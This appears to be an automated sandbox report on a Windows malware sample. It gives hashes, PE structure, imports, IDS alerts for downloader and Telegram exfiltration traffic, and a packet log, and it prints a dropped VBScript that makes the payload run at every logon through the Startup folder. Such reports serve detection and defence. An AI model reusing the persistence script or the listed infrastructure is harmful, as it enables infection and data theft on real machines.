                                                                                                                          Preview:.m.YGFYE4VEH.ZB.FJM0KY7.YDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZB.FJM>T.9Q.M.x.1..if>31r68"W98Zq:%(7*Dv'-.$/,r/$mt...<6 #wH=\aH2VZBRF"].fuF.'h7.;.'.6.u%<m7.3;..Iz(.8u4.(.9.(ha<8V<.5k.8'.7.;.u>6.'.<./)%.:.IQYDFYE0VEH2VZBRF..-Y7QY..YE|WAHF.Z.RFJM0KY7.YgGRD9VE.3VZZPFJM0Kv.QYDVYE0.DH2V.BRVJM0IY7TYDFYE0V@H2VZBRFJM4KY3QY.}[E2VE.2VJBRVJM0KI7QIDFYE0VUH2VZBRFJM0K."SY.FYE06GH..[BRFJM0KY7QYDFYE0VEH2VZBRF..1KE7QYDFYE0VEH2VZBRFJM0KY7QYDF.H2V.H2VZBRFJM0KY.PY.GYE0VEH2VZBRFJM0KY7QYDFYE0Vk<W..BRFR.1KY'QYD.XE0REH2VZBRFJM0KY7qYD&w7T71)2V./RFJ.1KYYQYD.XE0VEH2VZBRFJMpKYw.=%28E0V.x2VZbPFJ[0KY=SYDFYE0VEH2VZB.FJ..9*E2YDFi.1VE(0VZ.SFJm2KY7QYDFYE0VEHrVZ.RFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0VEH2VZBRFJM0KY7QYDFYE0V

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):268
                                                                                                                          Entropy (8bit):3.410606351568962
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1qlOaY3cEtDdnriIM8lfQVn:DsO+vNloRKQ1cYsGmA2n
                                                                                                                          MD5:24F37753E5CEADF625BDAB88925EC25B
                                                                                                                          SHA1:DDC4B2F2ACAA667B8ED8A4DA2CE1CC5D7C04AB3B
                                                                                                                          SHA-256:3ECBBD615EF1AEB1F10B8EE64EE014981A15BB5C52A0427A414216C6531F131A
                                                                                                                          SHA-512:F551BCC7B60CBABB9C5E80347D0C7FC7AF6AFBE41ED30CD75F380BA4E40C1BC649AF4F711D4E840E0BA41E56C04A5F2FE410C1982D54AEF6E2D4D9F2D04A5892
                                                                                                                          Malicious:true
                                                                                                                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.O.k.e.g.h.e.m.\.g.h.a.u.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.1731495033367105
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:3i1gMM8K4z.exe
                                                                                                                          File size:1'147'904 bytes
                                                                                                                          MD5:1d0c53e42bd84b7b7cfabed7dae7f570
                                                                                                                          SHA1:0b0df40afe9bed5720c361fe7ed63395e1a25f41
                                                                                                                          SHA256:ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944
                                                                                                                          SHA512:9ab7671f48d5dbeb58c93b61998762ed91da2f566421ff11f53edfdb6a65af0199ff4bb31647ec296cae7f85ba7cfc71340fbb931e6a05fd5aa03a43f5026057
                                                                                                                          SSDEEP:24576:cu6J33O0c+JY5UZ+XC0kGso6FaNAaW2Kh7ZClY9lnmWY:Gu0c++OCvkGs9FaNAaWphNCC1Y
                                                                                                                          TLSH:7835CE2273DDC360CB669173BF6AB7016EBF7C610630B85B2F880D79A950171166DBA3
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                          File Icon

                                                                                                                          Icon Hash:3570b480858580c5

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x427dcd
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6756289D [Sun Dec 8 23:15:41 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          call 00007FBDB0B18E7Ah
                                                                                                                          jmp 00007FBDB0B0BC44h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                                          mov eax, ecx
                                                                                                                          mov edx, ecx
                                                                                                                          add eax, esi
                                                                                                                          cmp edi, esi
                                                                                                                          jbe 00007FBDB0B0BDCAh
                                                                                                                          cmp edi, eax
                                                                                                                          jc 00007FBDB0B0C12Eh
                                                                                                                          bt dword ptr [004C31FCh], 01h
                                                                                                                          jnc 00007FBDB0B0BDC9h
                                                                                                                          rep movsb
                                                                                                                          jmp 00007FBDB0B0C0DCh
                                                                                                                          cmp ecx, 00000080h
                                                                                                                          jc 00007FBDB0B0BF94h
                                                                                                                          mov eax, edi
                                                                                                                          xor eax, esi
                                                                                                                          test eax, 0000000Fh
                                                                                                                          jne 00007FBDB0B0BDD0h
                                                                                                                          bt dword ptr [004BE324h], 01h
                                                                                                                          jc 00007FBDB0B0C2A0h
                                                                                                                          bt dword ptr [004C31FCh], 00000000h
                                                                                                                          jnc 00007FBDB0B0BF6Dh
                                                                                                                          test edi, 00000003h
                                                                                                                          jne 00007FBDB0B0BF7Eh
                                                                                                                          test esi, 00000003h
                                                                                                                          jne 00007FBDB0B0BF5Dh
                                                                                                                          bt edi, 02h
                                                                                                                          jnc 00007FBDB0B0BDCFh
                                                                                                                          mov eax, dword ptr [esi]
                                                                                                                          sub ecx, 04h
                                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                                          mov dword ptr [edi], eax
                                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                                          bt edi, 03h
                                                                                                                          jnc 00007FBDB0B0BDD3h
                                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                                          sub ecx, 08h
                                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                                          movq qword ptr [edi], xmm1
                                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                                          test esi, 00000007h
                                                                                                                          je 00007FBDB0B0BE25h
                                                                                                                          bt esi, 03h
                                                                                                                          jnc 00007FBDB0B0BE78h

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [ASM] VS2013 build 21005
                                                                                                                          • [ C ] VS2013 build 21005
                                                                                                                          • [C++] VS2013 build 21005
                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                          • [ASM] VS2013 UPD4 build 31101
                                                                                                                          • [RES] VS2013 build 21005
                                                                                                                          • [LNK] VS2013 UPD4 build 31101

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x4fb08.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1170000x711c.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0xc70000x4fb080x4fc00265d993524cad22adcc96f02f940b413False0.9726103301332288data7.96492014201574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x1170000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                          RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                          RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                          RT_ICON0xc77d00x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.906800563777308
                                                                                                                          RT_MENU0xc8dfc0x50dataEnglishGreat Britain0.9
                                                                                                                          RT_STRING0xc8e4c0x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                          RT_STRING0xc93e00x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                          RT_STRING0xc9a6c0x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                          RT_STRING0xc9efc0x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                          RT_STRING0xca4f80x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                          RT_STRING0xcab540x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                          RT_STRING0xcafbc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                          RT_RCDATA0xcb1140x4b4d5data1.0003274574710557
                                                                                                                          RT_GROUP_ICON0x1165ec0x14dataEnglishGreat Britain1.2
                                                                                                                          RT_GROUP_ICON0x1166000x14dataEnglishGreat Britain1.25
                                                                                                                          RT_GROUP_ICON0x1166140x14dataEnglishGreat Britain1.15
                                                                                                                          RT_GROUP_ICON0x1166280x14dataEnglishGreat Britain1.25
                                                                                                                          RT_VERSION0x11663c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                          RT_MANIFEST0x1167180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                          UxTheme.dllIsThemeActive
                                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishGreat Britain

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-10T23:44:11.833778+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:12.740058+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:13.314218+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:13.974425+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:15.177541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449736158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:15.771851+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:18.167719+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:21.863717+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449753104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:22.751745+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449754149.154.167.220443TCP
                                                                                                                          2025-01-10T23:44:27.333823+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:28.240064+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:28.800937+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449757104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:29.427855+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449758158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:30.599431+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449760158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:31.182244+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449761104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:31.818323+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449762158.101.44.24280TCP
                                                                                                                          2025-01-10T23:44:33.684415+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449765104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:34.928756+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449767104.21.16.1443TCP
                                                                                                                          2025-01-10T23:44:38.256299+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449772149.154.167.220443TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 10, 2025 23:44:10.982691050 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:10.987607956 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:10.988126993 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:10.988344908 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:10.993225098 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.597074986 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.612184048 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:11.617144108 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.780548096 CET8049731158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.833777905 CET4973180192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:11.839123964 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:11.839158058 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:11.839224100 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:11.849261045 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:11.849280119 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.339402914 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.339524984 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.344980955 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.344991922 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.345412016 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.396266937 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.404607058 CET49732443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:12.451330900 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.517551899 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.517646074 CET44349732104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:12.517693996 CET49732443192.168.2.4104.21.16.1
